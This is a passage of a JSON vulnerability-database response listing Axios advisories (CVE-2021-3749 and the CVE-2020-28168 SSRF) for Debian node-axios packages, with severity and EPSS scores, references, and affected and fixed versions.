2Bdfsg-1?distro=trixie","is_vulnerable":true,"
affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","pur
l":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2021-3749","GHSA-cph5-m8f7-6c5x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n89f-3nkb-ebg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36275?format=json","vulnerability_id":"VCID-xtpz-6f5t-t3ev","summary":"Axios vulnerable to Server-Side Request Forgery\nAxios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-28168.json","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-28168.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-28168","reference_id":"","reference_type":"","scores":[{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63467","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63474","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63498","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63485","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63466","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6348","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","sco
ring_elements":"0.63473","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6335","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6341","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63437","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63403","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63455","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63472","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.6349","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63439","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00446","scoring_system":"epss","scoring_elements":"0.63494","published_at":"2026-04-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-28168"},{"reference_url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28168","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28168"},{"reference_url":"https://github.com/axios/axios/commit/c7329fefc890050edd51e40e469a154d0117fc55","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scorin
g_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/c7329fefc890050edd51e40e469a154d0117fc55"},{"reference_url":"https://github.com/axios/axios/issues/3369","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/3369"},{"reference_url":"https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb51
44d61d6e@%3Ccommits.druid.apache.org%3E"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-28168","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-28168"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-AXIOS-1038255","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-AXIOS-1038255"},{"reference_url":"https://www.npmjs.com/advisories/1594","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/advisories/1594"},{"reference_url":"https://www.npmjs.com/package/axios","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.npmjs.com/package/axios"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1896130","reference_id":"1896130","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1896130"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975305","reference_id":"975305","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=975305"},{"reference_url":"https://github.com/advisories/GHSA-4w2v-q235-vp99","reference_id":"GHSA-4w2v-q235-vp99","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.
1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4w2v-q235-vp99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932084?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932081?format=json","purl":"pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vkx-cwua-rqe4"},{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vu
lnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932083?format=json","purl":"pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-kgnf-z6ca-tqgp"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:d
eb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2020-28168","GHSA-4w2v-q235-vp99"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xtpz-6f5t-t3ev"}],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie"}